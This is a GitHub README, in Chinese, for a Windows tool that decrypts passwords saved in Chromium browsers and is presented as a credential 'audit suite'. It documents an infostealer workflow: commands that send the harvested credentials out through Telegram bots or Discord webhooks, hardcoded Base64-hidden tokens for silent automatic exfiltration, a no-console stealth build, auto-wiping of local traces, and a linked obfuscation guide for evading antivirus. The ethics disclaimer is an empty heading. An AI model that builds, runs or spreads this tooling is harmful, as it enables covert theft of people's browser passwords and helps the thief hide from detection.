ANONIMO432HZ/decrypt-chromium-suite
GitHub: ANONIMO432HZ/decrypt-chromium-suite
一款 Windows 下 Chromium 内核浏览器凭证解密与审计工具,支持多浏览器、HTML/CSV 报告生成以及通过 Telegram 和 Discord 自动外发。
Stars: 1 | Forks: 0
# 🛡️ Chromium 凭证审计套件





*一款用于 Windows 环境下专业安全审计与道德渗透测试的高级套件。*
[报告 Bug](https://github.com/ANONIMO432HZ/decrypt-chromium-suite/issues) | [提出改进建议](https://github.com/ANONIMO432HZ/decrypt-chromium-suite/issues)
## 💻 系统兼容性
| 操作系统 | 支持版本 | 架构 |
| :--- | :--- | :--- |
| 🪟 **Windows** | Windows 10 / Windows 11 | x64 / x86 |
| 🌐 **Chromium** | v80 或更高版本 (AES-GCM) | 全部 |
## ✨ 支持的浏览器
本套件会自动扫描并解密以下目标:
* 🌐 **Google Chrome** (Canary, Beta, Stable)
* 🌐 **Microsoft Edge**
* 🦁 **Brave Browser**
* ⭕ **Opera & Opera GX**
* 📐 **Vivaldi**
## 🚀 高级特性
* **📡 模块化数据外发**:
* 通过 **Telegram Bot** 或 **Discord Webhooks** 即时发送报告。
* **📊 动态报告**:
* 生成美观的 **交互式 HTML** 或 **CSV** 文件报告。
* **🕵️ 隐身架构 (Stealth)**:
* 自动清理临时数据库,并在数据外发后对本地报告执行 **自动擦除 (Auto-Wipe)**。
## 🛠️ 技术栈
| 组件 | 使用技术 |
| :--- | :--- |
| **语言** | `Python 3.x` |
| **OS 安全** | 通过 `PyWin32` 调用 `Windows DPAPI` |
| **加密** | 通过 `PyCryptodomex` 实现 `AES-GCM 256` |
| **通信** | `Telegram API` & `Discord Webhooks` |
| **打包** | `PyInstaller` (独立 EXE) |
## ⚙️ 快速使用指南
### 1. 安装依赖
```
pip install -r requirements.txt
```
### 2. 核心命令
```
python main.py -f html -o reporte_final
```
```
python main.py -t "TOKEN" -c "ID" # Soporta Texto Plano o Base64
```
### 🔑 硬编码自动运行 (Hardcoding)
你可以通过编辑 `main.py` 中的 `CREDENCIALES HARDCODED` 部分来预配置脚本(建议使用 **Base64** 以提高隐蔽性)。填写完毕后,你可以直接运行 `.exe` 或脚本而无需指定参数,数据将会自动发送。
## 📦 专业编译 (.exe)
```
# 隐蔽编译:无控制台窗口,单文件便携版
pyinstaller --onefile --noconsole --name "ChromiumAuditor" main.py
```
### 🛡️ 加固与混淆
为了保护二进制文件免受逆向工程和杀毒软件的查杀,请参阅 [混合混淆指南](docs/OBFUSCATION_GUIDE.md)。
### ⚙️ 高级编译指南
有关混合(Windows + WSL)或纯(带有 Wine 的 Linux)编译流程的详细说明,请参阅 [编译流程指南](docs/COMPILATION_FLOWS.md)。
## 🚦 CLI 参数面板
| 短选项 | 长选项 | 描述 |
| :--- | :--- | :--- |
| `-f` | `--format` | 格式:`html` 或 `csv`。 |
| `-o` | `--output` | 输出文件的基本名称。 |
| **`-t`** | `--telegram-token` | Telegram Bot 的 Token(明文或 B64)。 |
| **`-c`** | `--telegram-chatid` | Telegram 的 Chat ID(明文或 B64)。 |
| **`-d`** | `--discord` | Discord Webhook 的 URL(明文或 B64)。 |
| `-s` | `--stealth` | 实时隐藏控制台(与 `.exe --noconsole` 效果相同)。 |
| — | `--no-wipe` | 阻止自动删除报告。 |
| `-v` | `--verbose` | 详细模式(输出详细日志)。 |
## 📡 外发配置
### 🤖 Telegram
你需要提供两个值:**Bot Token** 和 **目标 ID**。
**Bot Token** — 在 Telegram 中与 `@BotFather` 对话获取:
```
1234567890:ABCdefGHIjklMNOpqrSTUvwxYZ
```
**目标 ID** — `-c` 参数 / `HARDCODED_TG_ID` 字段接受以下三种类型:
| 目标类型 | ID 格式 | 获取方法 |
| :--- | :--- | :--- |
| 💬 **个人聊天** | 正数 `987654321` | 与 `@userinfobot` 对话 |
| 👥 **私密群组** | 负数 `-1001234567890` | 将 `@RawDataBot` 拉入群组 |
| 📢 **私密频道** | 负数 `-1001234567890` | 将 Bot 添加为频道管理员 |
### 🎮 Discord
在以下位置获取 Webhook URL:**频道 → 编辑频道 → 整合 → Webhooks → 创建 Webhook**
```
https://discord.com/api/webhooks/1234567890/TOKEN_SECRETO_AQUI
```
将完整的 URL 粘贴到 `-d` 参数 / `HARDCODED_DS_WEBHOOK` 中。
### 🔒 操作安全建议
为实现最大程度的隐蔽和零追踪:
1. 为每次审计创建一个**专属的私密频道**。
2. 将 Bot 添加为该频道的唯一管理员。
3. 使用该频道 ID 作为 `HARDCODED_TG_ID`。
4. 在审计结束时**删除该频道和 Bot**。
这样一来,即使 Token 泄露,攻击者访问的也只会是一个已被清空和删除的频道。
## ⚖️ 法律与道德声明标签:AES-GCM加密, Chromium, Conpot, Discord Webhooks, HTTP工具, Python, SQLite, Telegram Bot, Windows DPAPI, Windows安全, 凭证审计, 子域名变形, 数据加解密, 数据窃取, 数据解密, 无后门, 浏览器密码提取, 漏洞挖掘, 白帽子工具, 网络安全, 逆向工具, 隐私保护